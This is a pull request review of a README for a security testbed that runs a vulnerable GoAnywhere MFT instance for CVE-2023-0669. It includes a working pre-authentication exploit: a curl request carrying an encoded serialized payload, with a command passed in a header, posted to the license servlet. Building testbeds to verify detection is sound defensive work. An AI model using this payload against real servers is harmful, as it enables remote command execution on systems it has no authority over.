add env goanywhere_mft CVE-2023-0669 (#90)
google/security-testbeds: goanywhere/goanywhere_mft/CVE-2023-0669/README.md

# GoAnywhere MFT CVE-2023-0669

## Description of Vulnerability

GoAnywhere MFT RCE vulnerability CVE-2023-0669.

GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to
deserializing an arbitrary attacker-controlled object.

> All versions prior to 7.1.1 are affected,Update GoAnywhere MFT to a version that provides a fix 7.1.2 or later

Reviewer: ```suggestion
All versions prior to 7.1.1 are affected. Update GoAnywhere MFT to a fixed version, i.e. 7.1.2 or later
```

## Launch Testbed

### Vulnerable setup

> 1. download image

Reviewer: ```suggestion
1. Pull the image
```

```sh
docker pull kutzhanov/goanywhere:6.8.6
```

> 2. run container

Reviewer: ```suggestion
2. Start the container
```

```sh

> docker run --publish 38000:8000 --publish 38001:8001 --publish 38005:8005 --publish 38006:8006 --publish 38009:8009 --publish 38010:8010 --publish 38443:8443 --publish 38021:8021 --publish 38022:8022 --publish 32001-32300:32001-32300 --publish 34434:4434 --publish 34121:2121 --publish 39909:9909 --publish 34222:2222  --publish 36330:6330 --publish 35005:5005  --name my_mft_6_8_6 kutzhanov/goanywhere:6.8.6

Reviewer: ```suggestion
docker run --rm --publish 38000:8000 kutzhanov/goanywhere:6.8.6
```

Simplified command:
- `--rm` deletes the container after the testbed exits
- Removed all unused ports

```

> 2. The instance will be available on port 38000

Reviewer: ```suggestion
2. The instance will be available on [http://localhost:38000](http://localhost:38000)
```

> 3. Install goanywhere mft, fill license code[www.goanywhere.com/trial](www.goanywhere.com/trial) and create the
>    administrator account

Reviewer: ```suggestion
3. Complete the setup by providing a license and creating the administrator account. You can get a trial license from [https://www.goanywhere.com/trial](https://www.goanywhere.com/trial).
```

### Non-vulnerable setup

> change the image:
> 
> ```sh
> docker pull helpsystems/goanywhere-mft:7.1.3
> ```

Reviewer: ```suggestion
Repeat the process with a fixed version:

```sh
docker pull helpsystems/goanywhere-mft:7.1.3
docker run --rm --publish 38000:8000 helpsystems/goanywhere-mft:7.1.3
```
```

> ## VulnerabilityTest

Reviewer: ```suggestion
## Vulnerability Test
```

You can use the following command to check whether the instance is vulnerable or not

```

> curl -i -s -k -X $'POST' \
>     -H $'Host: [127.0.0.1:38000]' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Connection: close' -H $'x-protect: echo goanywhere_vulnerability' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 5853' \
>     --data-binary $'bundle=Jh88_jqGQWSbZmiCc1DErQhwOhCTLkYmA1yXgf86Ha5HF9IfVuQMLOfBS_fjlP7wTTEg2-Jx9nBDyFUKVTroXpFBt7zN1XDX58VKZCxCXlUD45d4laUUnNuzdyvNLT2b_gYKBi2-ny7fc2lOHNgalYV13mQzCTs0EgEUE9AuDUIMcFYx00pv4g4EOgEjeWbAx40rTtRby71AxapyXKy-4XChDHVlPB1AV3njBKGWT6gHdPxT8hb75Ycrpjdk9EQ1HW4WJiz4uaVBu7hXm_Eag15IpIWgojFy4hst8-q9YMms8Omq5lbdLabUHRcJAd6rLu6QrPLepYXQgGfMi_Qmj0qf5vXLfSX20cSBT_IEBlzzBR3lq_hiqrAfmZZCV3Y1HeMPpaMsmzL5zM1VTMX-5Pi5JGKMJ2Al2BZVZUUZQNqrcnueMVl1ZNhGMJ8eSFBCb4WGaNrhfgQ3sWUW3_A_ln_XwLi8z6XCOT5sJmFYZXBC4vYtY4leatX_o__lJHYPuA_TEmuEmEhIccj5Ou2xOvazmw9oXVUbM0vkPsb1UDyyTF0Ee85W0CUUCzb3rouvUDFaOZZLe08Z_Km2LgSq9Wr3fKojx_UevkOkOfwfiPlnJcQTRr45useRtOlHrJpP1iWSLi2vwK8bojMdCWzF13H8MmDjrJBCbcbChsXQkNcAJqkYa3y2SZXkwISRigFVLRnjDbyQLqLAzE0inCSf7NF9abKU5ZW8yMgF6NT802MJCz0gRJD6zLbFZSBYfGlzFJmu9-ZWYVywkwmu3xQrrA_tCRdqvd5zeHd3CgWOzBjOg55_iBNcPZOPYhMXD1ZEpPyG0CQpJfIUiblo4gGV0op-Mb2z5HIuvJ-l_YCxoYJi5RCdtgGoSmIo9wN59S0PeI6LI69EsoquDh7EA9Z7pc6XGk6rrbsJoFcV-lp_73dwmOH1U6pZRcEeMYgrB3n_R0BsoYHTika_iGEmmYv1CgBDfMlmVdQbtefAwh_AcJ9pyNACTwWdXQ0xmto3YYLbizDnmZ--NeiQ_534fTrGfjcIsbLgEnHcpG7Fwng72m7pHVy5LpurnRJXJyFBJW9IUF0vwH_UDZtAfeBK4kMbkuJrCTtQdyCks5SjfQWTArKeNGiKbGWReNhOnUnK8A2sxiYtvqlUi01mfOIfoc-9Lp6wXEBrNzWHH0zPWu4SNQmhR-JwmvFeIErraf83vz0_sRoU7IcSqKEF5zFjFF8n1oWqwBP5a3s_fKgbQ_UA74vmFh5cc_tlpBXS1oG8_EU5GAFI-woAA0Mlgkwmo-fGH1w1wB1LSOzgiT7r4QKDko55Timnwpk_D4RmXesvtu49-xyXcg4sL6NG5ujC6o5kKbTrwi7Vp8hjEx1v6nXeMfUbuWjYicH-ZIE_P_SMevvDUOQm3UZ67MbmdkReIR32TN_88A4J5dKN0QC08HLkYNSjsRp7XyXbSi5dZp3eQ6zkW9KuYU-S-NSBC9pV4arvsZXcwtWRTjweK49JIIgLMayI4y9TOjhg-LiwwzIlTY_t0KuzHSIYSw82LxmOeDhdQUC-sSOeV1G2sR095x3NDmfEfdvduTceU9cD3ofEFtedX5Z77aGFoVhdoG_hOjnYnaoaWYPe7JChYE0TZZfu3V7HF57X0cwoYYPDP6XzSf6kmxEWDoenYsPTmY_Evhqwp3Fhzko8_G-UR2tNH9JjIoouCEd8o8Gy7gnye2_u6wzCBuChv1yEug0miW8nSCQk69oHWeti94h1toBecBt70m8ySDHgL80vs4n5qHK2Mjv_eb3a5UrajOObvfoNMg_K85EudKBrdgW6bEV5KsZhFBDpDnxA7X8CHEHZiK4iDCFUCmSMCXQz7KqkHrcWh8l1ut7IPoxuiRhdI5wuNSw-xVmVwM1kJo5ahlOZcsARCNZ9NcAjcqojMDZjgkPo7lt-5Lrl2gPHg80YkNsfdB8Ao91vcZ6UuJ45ERB1G8V7TwxCMsHU8h8FFet1zb55rcBE-YJ5rvzaXif3OOFiS4MnA0LDszZkFJ4gW2SIMban79bz38yBnEz-au5l2SwkG7tY3DiKobiIz6ZJjOzVj2jAT7MsCpB8XNl8tCMYJHWErFrExXbosh-YvXoU8HCN_XALqBSZJyffqKu0iAYcyxc35QQl55ll-IybJU3Gu4LPGT6HXPlK3Hepmdd1ZhLzQG-adp465TzIDX-0YUK_Px-J0gmoW-kgUiGAVKrHIS4Qh-1E80u7GI_WUZTXSE7sgKUX-2qEUj6reo7Kf_4c_CZrwkA4RtoQrQMCs4Bs7dAft1eAqb9O-SDcW8kShwpUow3nz6PFKkdZ4SjYTNUjANTJT_7Yvzu-nHDPpEyriuZ4zcGKTadRgL2bbv1MwcTzJ1iCGMGXNk-sMiqOpqGdW_tAbfrGAuAjSiK5vCK4tO2xjR9qlMu9mzvC6FWXMlgoDFWbrXDSLUWWpgthJssAzniuX1iuGBlWmC7MzOCLQYyHKTIGDysqW4BgHQabqeXtqPoCLUCcCY8tlaACSFFe9ZQcQXgTHwClL5_TI2-9Cn5wIz28o-krld22hZ5KUWvXcW_278n6TxUJZPArM-KweuxdkzFYHjg1i8eZygMFz17MA9rUSTJzG7qvyXR_OIvI9EcGVP91noBQ2pN9zqFq7o81DRUmrNbNL1I4GPwK4kkLJVOJ1o6Hgw-zXmjeMveQII-aRzh-O2zZ9dpBJ8Yne7nWgeq1XAxW3A0lkqKr5hRbJD8najEI1xWvUEBHbPLD3oy4FGrs2Pegj7JlsGIwcmsQ8S_3bcp9ycdpNWXR0qgku3ltIZdFfW3Tnm-NFbfvkIRqmk8CaYsX2NlXGCJBLSt5HHioXDyUn1dRKvTpLx8aw41HqqGAACACvSWo0VLi4uXvxUZTgeA7q6BzH7KxptrTX62rBrU6R2ul5cgjTEYnakqcNUyJDjbxHBw1wY3k75erwfFj_pc6pE0PlB9zqIROk0yOiy2OWpg4KCAjryY1U0eOjnZVsoWjEuBT7Uvu0_9h04yZqToxRfu0WIODBLGJZ0lpx2bXtcaZPRFNwOFAeGHNpSY-ZO48bQR2Eo8kbB62w5DU6pKlFzCzK-bOzVvYUYDkYoQUSclOkW96M0hQ5DvJggB14AuXv0n4jsC1j_z4Yg1oeVnSbDA1PuGcAq8TovQX1KzpSHORoQFEhcclGxhc5-6kPt_cqImHd2C2UpYhVGEff3d2ShRzOETbELCR9w5OLY5EB4AxIOB9K4UUB-iqusjEmTYogjUUPhrHz1Dl88DD-W_QIR1fSpKDlCKWZXLWueZKXEFTKTIrWltCqbANJMPx5ww4Yo7jau6jZOPZWaZg_rApAJ4GhISBNRNUaRMUwRuKHrIaXBamJfkZXZNBJaUyv5uFXkCqkKlotr3JpOe8kBeFq_h-mmgM5G2pCK1LvnpIzXqMe1vPuR7om0ar4hRpV8aBlmhG9M7N2NQS50c-d96qKQQNDT_RgKslJfEPl4LuBie9IFlZ9qbpyq25XadMoDvDjuddAGb2jouTI8t1wXoK_fGMzUlPa7_Fq1yJqaeLF4gvoqZcEdocc0BZuM_8YqQGPhPRtxJ2wfnJ-9rdz58RNX8KoUnPEo7Y_GU5MqcmIsIqWgLkLHbFTytO9Xf2v90LKZoJy6vxfuD0C3ocGZ4syFrus4zZ0ydMU8L0b5A4Z9c4U7LE4kn79ujOBeseZDE1nAr2RL1c9ReAjJ6CLqpPYTihhLHglog64HMcxTGj1_fEnrNB53mzD0cw1UB5_kRE-Yr_JY0PRvYYGVfKfaXeklUVn3Rb-npVABFVQ6XrCN1dUFOhy4rUe3mZ3kyAXvjpXiRrkRnbKAk1c2ynLrIDetbNoQQGdIouuBEDX9NJIE9zKAttSQBpC5Xkoeu68oQcTU3IW_N848fuGIUsUl4oqO1wjNuG4TTBCCA82gu269_LCg5jB9JEa-DlhPzRwoGhJ4muc1ThgsINoLcevNu5iwP-ebUQfolW6ZdR3i12Eh9bZi3yiE7Sieb-dXx_qm5IrdlY0SZWKNC8OqlxVUzLaseMBE3kPrT-Dz6ClJXewCEU1vGYzPvKggCgg5clwEwsjGsOq7XYLGRJ9f5pMKZkcfO6-v4FpCk3fjHh0NDDZ8EE3i74a5fh1wVKsR2EJPpl6bEpWhMUDPtcavuTP7xbJC1sFDuLzoSE6qVXLbZFWPS6VMCEzkJ1-FxVsVE_WE4v72iygfLGZaOFgzyVOSEZAm8GThgHsxrKTb2_v5JcWLuock1Z6uva8P13htuNHACPZ3yhkXbuJ2b-6ucy2ZLurigtEDsNsmXsybmWdpS4vA6gnPDr5iSxVXz4BLyW0ShEbKLls_eJ_pH-y1b9Hw0KVVbcE05-bckumz7H-LwhcGVBsi2SKpoGSugH6gbX_fqrraMB0aC-0v6JIZ8WUNa7ElaMfJsE6XstjaE7KjXFHuhyQKeHgWKjm1oV8yLW7vRuqhs5RfWV3E09y2yASv_DY1WxMotFAqOHhz-zt3CiZCXQkPsjly3uHDKLrIjMYrHFvPPmQ8jD6AWiupBSVUi9yFnSFeZq8Ws3-Ki8JQEuWtMhCOsF5nBIb9NUifxO6sK2hUlbBVnhGV1PAz1FZ0tMHhFg7AVeviqUlePVASRtUQ-HmW9qPqH1UXiwysQAprepW6tHuExtYchRcla7ApOqUcQl1oCdQl6tsvn3ewlMTHvAyhUMjeap3yHlzUro-kFf-D285ircmCHRvoXgySqqZjO_8hkEcgBEWSp5Yn8xNZmw9PEthJzvAL2F6UfY58G_WrSIj5B-6GgHdgDVSzLiYSh_lrMFEd4QBtVYLz9KWlY5jjXxmN50RjWGhf2qx0iGrFC2ZnAwN6RxrB07Gl-nI2rAYVWoa_oIz_3s2rI7ll6fvzmdwKrSPNdcnG3MYVvTo8gAHrvhgFUje71_EgabRgOQv6XFCX6Vhsh9crycXjtISPU8ZWnf9tSQh-nUBplB2Go2WSmmLk1Rhu0deMsChn6dI7OQ-ed-36C_on1CY5bSuEkpJxxsNrcZTdmRG3KPlwHVcZ1kfFKlSTnFPjoOq1VLgLGuaOJFFiTerU2tbfj8rbgZbYOeZZToik7OirRjX_oTyKwHGQq5Y0d_W1Whwr8i5xK-V4HsdDOAOPv7NzL8-yxnL73kWP2357B_8yvUxHKjZ_ynyr--_ueBVZbOwnt4oBpbtsLh7_A6vo0MdBs2HpRRq8USpxlgN_s_2DNFRrxejgphOPDeHT-_mh7ey3lSZNMt3NU2M7lPWzWsffu5R5PXY9BxJT0PsUAgJS3i-sB5D4Fg7e4WiF83UroEYaz9mM0B-7VQ7hkqBgPEiDH2rZpUyhsG51TlYSbzb46g41vXdFpygqntOlEgBYkVbLwN3fIM9s2RL4908QD8o-ePuO-CnFL5KU5Yh7IcBx8a2FovJf07J7IoShuB2grZ7Uq8hwa5OJjZ0yN1pz1KsdT_OKONiiDiWvf67QRkrogsxA2PbFC4Qhr1ZwOnEO8fhZTFx_fdt5_z7RkjfObiDBNqGGY5iBnjxinzh67mODT_vohU7L3gPCkVnqcU2zUbiBsT-Xu0HGyQOPpBp5wS2QHln6GdmTkmARnSa4Mc1CU0x4YzmAoTU4v8xLCtucHHFHrYMB_MFJg_2rM_XxJVKjnU2ej7BFSbnyc_1XE12z9ca6dYywmwtTFtHSpJf-70SBU_nebcnTcUXMp2JTWdRUgGScybrwM4wGSYUq7THJqm297dQ9fJ9GjnWLOK3JQ7K2GjVWWmXKrlYlwKgx_3XDUUYErlZAw13_iQXLMZOUteWthVndxp9STpcQ' \
>     $'http://[127.0.0.1:38000]/goanywhere/lic/accept'

Reviewer: ```suggestion
curl -s -H 'x-protect: echo goanywhere_vulnerability' --data-binary 'bundle=Jh88_jqGQWSbZmiCc1DErQhwOhCTLkYmA1yXgf86Ha5HF9IfVuQMLOfBS_fjlP7wTTEg2-Jx9nBDyFUKVTroXpFBt7zN1XDX58VKZCxCXlUD45d4laUUnNuzdyvNLT2b_gYKBi2-ny7fc2lOHNgalYV13mQzCTs0EgEUE9AuDUIMcFYx00pv4g4EOgEjeWbAx40rTtRby71AxapyXKy-4XChDHVlPB1AV3njBKGWT6gHdPxT8hb75Ycrpjdk9EQ1HW4WJiz4uaVBu7hXm_Eag15IpIWgojFy4hst8-q9YMms8Omq5lbdLabUHRcJAd6rLu6QrPLepYXQgGfMi_Qmj0qf5vXLfSX20cSBT_IEBlzzBR3lq_hiqrAfmZZCV3Y1HeMPpaMsmzL5zM1VTMX-5Pi5JGKMJ2Al2BZVZUUZQNqrcnueMVl1ZNhGMJ8eSFBCb4WGaNrhfgQ3sWUW3_A_ln_XwLi8z6XCOT5sJmFYZXBC4vYtY4leatX_o__lJHYPuA_TEmuEmEhIccj5Ou2xOvazmw9oXVUbM0vkPsb1UDyyTF0Ee85W0CUUCzb3rouvUDFaOZZLe08Z_Km2LgSq9Wr3fKojx_UevkOkOfwfiPlnJcQTRr45useRtOlHrJpP1iWSLi2vwK8bojMdCWzF13H8MmDjrJBCbcbChsXQkNcAJqkYa3y2SZXkwISRigFVLRnjDbyQLqLAzE0inCSf7NF9abKU5ZW8yMgF6NT802MJCz0gRJD6zLbFZSBYfGlzFJmu9-ZWYVywkwmu3xQrrA_tCRdqvd5zeHd3CgWOzBjOg55_iBNcPZOPYhMXD1ZEpPyG0CQpJfIUiblo4gGV0op-Mb2z5HIuvJ-l_YCxoYJi5RCdtgGoSmIo9wN59S0PeI6LI69EsoquDh7EA9Z7pc6XGk6rrbsJoFcV-lp_73dwmOH1U6pZRcEeMYgrB3n_R0BsoYHTika_iGEmmYv1CgBDfMlmVdQbtefAwh_AcJ9pyNACTwWdXQ0xmto3YYLbizDnmZ--NeiQ_534fTrGfjcIsbLgEnHcpG7Fwng72m7pHVy5LpurnRJXJyFBJW9IUF0vwH_UDZtAfeBK4kMbkuJrCTtQdyCks5SjfQWTArKeNGiKbGWReNhOnUnK8A2sxiYtvqlUi01mfOIfoc-9Lp6wXEBrNzWHH0zPWu4SNQmhR-JwmvFeIErraf83vz0_sRoU7IcSqKEF5zFjFF8n1oWqwBP5a3s_fKgbQ_UA74vmFh5cc_tlpBXS1oG8_EU5GAFI-woAA0Mlgkwmo-fGH1w1wB1LSOzgiT7r4QKDko55Timnwpk_D4RmXesvtu49-xyXcg4sL6NG5ujC6o5kKbTrwi7Vp8hjEx1v6nXeMfUbuWjYicH-ZIE_P_SMevvDUOQm3UZ67MbmdkReIR32TN_88A4J5dKN0QC08HLkYNSjsRp7XyXbSi5dZp3eQ6zkW9KuYU-S-NSBC9pV4arvsZXcwtWRTjweK49JIIgLMayI4y9TOjhg-LiwwzIlTY_t0KuzHSIYSw82LxmOeDhdQUC-sSOeV1G2sR095x3NDmfEfdvduTceU9cD3ofEFtedX5Z77aGFoVhdoG_hOjnYnaoaWYPe7JChYE0TZZfu3V7HF57X0cwoYYPDP6XzSf6kmxEWDoenYsPTmY_Evhqwp3Fhzko8_G-UR2tNH9JjIoouCEd8o8Gy7gnye2_u6wzCBuChv1yEug0miW8nSCQk69oHWeti94h1toBecBt70m8ySDHgL80vs4n5qHK2Mjv_eb3a5UrajOObvfoNMg_K85EudKBrdgW6bEV5KsZhFBDpDnxA7X8CHEHZiK4iDCFUCmSMCXQz7KqkHrcWh8l1ut7IPoxuiRhdI5wuNSw-xVmVwM1kJo5ahlOZcsARCNZ9NcAjcqojMDZjgkPo7lt-5Lrl2gPHg80YkNsfdB8Ao91vcZ6UuJ45ERB1G8V7TwxCMsHU8h8FFet1zb55rcBE-YJ5rvzaXif3OOFiS4MnA0LDszZkFJ4gW2SIMban79bz38yBnEz-au5l2SwkG7tY3DiKobiIz6ZJjOzVj2jAT7MsCpB8XNl8tCMYJHWErFrExXbosh-YvXoU8HCN_XALqBSZJyffqKu0iAYcyxc35QQl55ll-IybJU3Gu4LPGT6HXPlK3Hepmdd1ZhLzQG-adp465TzIDX-0YUK_Px-J0gmoW-kgUiGAVKrHIS4Qh-1E80u7GI_WUZTXSE7sgKUX-2qEUj6reo7Kf_4c_CZrwkA4RtoQrQMCs4Bs7dAft1eAqb9O-SDcW8kShwpUow3nz6PFKkdZ4SjYTNUjANTJT_7Yvzu-nHDPpEyriuZ4zcGKTadRgL2bbv1MwcTzJ1iCGMGXNk-sMiqOpqGdW_tAbfrGAuAjSiK5vCK4tO2xjR9qlMu9mzvC6FWXMlgoDFWbrXDSLUWWpgthJssAzniuX1iuGBlWmC7MzOCLQYyHKTIGDysqW4BgHQabqeXtqPoCLUCcCY8tlaACSFFe9ZQcQXgTHwClL5_TI2-9Cn5wIz28o-krld22hZ5KUWvXcW_278n6TxUJZPArM-KweuxdkzFYHjg1i8eZygMFz17MA9rUSTJzG7qvyXR_OIvI9EcGVP91noBQ2pN9zqFq7o81DRUmrNbNL1I4GPwK4kkLJVOJ1o6Hgw-zXmjeMveQII-aRzh-O2zZ9dpBJ8Yne7nWgeq1XAxW3A0lkqKr5hRbJD8najEI1xWvUEBHbPLD3oy4FGrs2Pegj7JlsGIwcmsQ8S_3bcp9ycdpNWXR0qgku3ltIZdFfW3Tnm-NFbfvkIRqmk8CaYsX2NlXGCJBLSt5HHioXDyUn1dRKvTpLx8aw41HqqGAACACvSWo0VLi4uXvxUZTgeA7q6BzH7KxptrTX62rBrU6R2ul5cgjTEYnakqcNUyJDjbxHBw1wY3k75erwfFj_pc6pE0PlB9zqIROk0yOiy2OWpg4KCAjryY1U0eOjnZVsoWjEuBT7Uvu0_9h04yZqToxRfu0WIODBLGJZ0lpx2bXtcaZPRFNwOFAeGHNpSY-ZO48bQR2Eo8kbB62w5DU6pKlFzCzK-bOzVvYUYDkYoQUSclOkW96M0hQ5DvJggB14AuXv0n4jsC1j_z4Yg1oeVnSbDA1PuGcAq8TovQX1KzpSHORoQFEhcclGxhc5-6kPt_cqImHd2C2UpYhVGEff3d2ShRzOETbELCR9w5OLY5EB4AxIOB9K4UUB-iqusjEmTYogjUUPhrHz1Dl88DD-W_QIR1fSpKDlCKWZXLWueZKXEFTKTIrWltCqbANJMPx5ww4Yo7jau6jZOPZWaZg_rApAJ4GhISBNRNUaRMUwRuKHrIaXBamJfkZXZNBJaUyv5uFXkCqkKlotr3JpOe8kBeFq_h-mmgM5G2pCK1LvnpIzXqMe1vPuR7om0ar4hRpV8aBlmhG9M7N2NQS50c-d96qKQQNDT_RgKslJfEPl4LuBie9IFlZ9qbpyq25XadMoDvDjuddAGb2jouTI8t1wXoK_fGMzUlPa7_Fq1yJqaeLF4gvoqZcEdocc0BZuM_8YqQGPhPRtxJ2wfnJ-9rdz58RNX8KoUnPEo7Y_GU5MqcmIsIqWgLkLHbFTytO9Xf2v90LKZoJy6vxfuD0C3ocGZ4syFrus4zZ0ydMU8L0b5A4Z9c4U7LE4kn79ujOBeseZDE1nAr2RL1c9ReAjJ6CLqpPYTihhLHglog64HMcxTGj1_fEnrNB53mzD0cw1UB5_kRE-Yr_JY0PRvYYGVfKfaXeklUVn3Rb-npVABFVQ6XrCN1dUFOhy4rUe3mZ3kyAXvjpXiRrkRnbKAk1c2ynLrIDetbNoQQGdIouuBEDX9NJIE9zKAttSQBpC5Xkoeu68oQcTU3IW_N848fuGIUsUl4oqO1wjNuG4TTBCCA82gu269_LCg5jB9JEa-DlhPzRwoGhJ4muc1ThgsINoLcevNu5iwP-ebUQfolW6ZdR3i12Eh9bZi3yiE7Sieb-dXx_qm5IrdlY0SZWKNC8OqlxVUzLaseMBE3kPrT-Dz6ClJXewCEU1vGYzPvKggCgg5clwEwsjGsOq7XYLGRJ9f5pMKZkcfO6-v4FpCk3fjHh0NDDZ8EE3i74a5fh1wVKsR2EJPpl6bEpWhMUDPtcavuTP7xbJC1sFDuLzoSE6qVXLbZFWPS6VMCEzkJ1-FxVsVE_WE4v72iygfLGZaOFgzyVOSEZAm8GThgHsxrKTb2_v5JcWLuock1Z6uva8P13htuNHACPZ3yhkXbuJ2b-6ucy2ZLurigtEDsNsmXsybmWdpS4vA6gnPDr5iSxVXz4BLyW0ShEbKLls_eJ_pH-y1b9Hw0KVVbcE05-bckumz7H-LwhcGVBsi2SKpoGSugH6gbX_fqrraMB0aC-0v6JIZ8WUNa7ElaMfJsE6XstjaE7KjXFHuhyQKeHgWKjm1oV8yLW7vRuqhs5RfWV3E09y2yASv_DY1WxMotFAqOHhz-zt3CiZCXQkPsjly3uHDKLrIjMYrHFvPPmQ8jD6AWiupBSVUi9yFnSFeZq8Ws3-Ki8JQEuWtMhCOsF5nBIb9NUifxO6sK2hUlbBVnhGV1PAz1FZ0tMHhFg7AVeviqUlePVASRtUQ-HmW9qPqH1UXiwysQAprepW6tHuExtYchRcla7ApOqUcQl1oCdQl6tsvn3ewlMTHvAyhUMjeap3yHlzUro-kFf-D285ircmCHRvoXgySqqZjO_8hkEcgBEWSp5Yn8xNZmw9PEthJzvAL2F6UfY58G_WrSIj5B-6GgHdgDVSzLiYSh_lrMFEd4QBtVYLz9KWlY5jjXxmN50RjWGhf2qx0iGrFC2ZnAwN6RxrB07Gl-nI2rAYVWoa_oIz_3s2rI7ll6fvzmdwKrSPNdcnG3MYVvTo8gAHrvhgFUje71_EgabRgOQv6XFCX6Vhsh9crycXjtISPU8ZWnf9tSQh-nUBplB2Go2WSmmLk1Rhu0deMsChn6dI7OQ-ed-36C_on1CY5bSuEkpJxxsNrcZTdmRG3KPlwHVcZ1kfFKlSTnFPjoOq1VLgLGuaOJFFiTerU2tbfj8rbgZbYOeZZToik7OirRjX_oTyKwHGQq5Y0d_W1Whwr8i5xK-V4HsdDOAOPv7NzL8-yxnL73kWP2357B_8yvUxHKjZ_ynyr--_ueBVZbOwnt4oBpbtsLh7_A6vo0MdBs2HpRRq8USpxlgN_s_2DNFRrxejgphOPDeHT-_mh7ey3lSZNMt3NU2M7lPWzWsffu5R5PXY9BxJT0PsUAgJS3i-sB5D4Fg7e4WiF83UroEYaz9mM0B-7VQ7hkqBgPEiDH2rZpUyhsG51TlYSbzb46g41vXdFpygqntOlEgBYkVbLwN3fIM9s2RL4908QD8o-ePuO-CnFL5KU5Yh7IcBx8a2FovJf07J7IoShuB2grZ7Uq8hwa5OJjZ0yN1pz1KsdT_OKONiiDiWvf67QRkrogsxA2PbFC4Qhr1ZwOnEO8fhZTFx_fdt5_z7RkjfObiDBNqGGY5iBnjxinzh67mODT_vohU7L3gPCkVnqcU2zUbiBsT-Xu0HGyQOPpBp5wS2QHln6GdmTkmARnSa4Mc1CU0x4YzmAoTU4v8xLCtucHHFHrYMB_MFJg_2rM_XxJVKjnU2ej7BFSbnyc_1XE12z9ca6dYywmwtTFtHSpJf-70SBU_nebcnTcUXMp2JTWdRUgGScybrwM4wGSYUq7THJqm297dQ9fJ9GjnWLOK3JQ7K2GjVWWmXKrlYlwKgx_3XDUUYErlZAw13_iQXLMZOUteWthVndxp9STpcQ' http://127.0.0.1:38000/goanywhere/lic/accept
```
Simplified PoC, the previous one did not work due to some header.

```

A vulnerable instance will reply with the following message:

```
goanywhere_vulnerability
```

> while a safe instance will output the the 400 html:

Reviewer: ```suggestion
while a safe instance will reply with status code 400 and the following body:
```
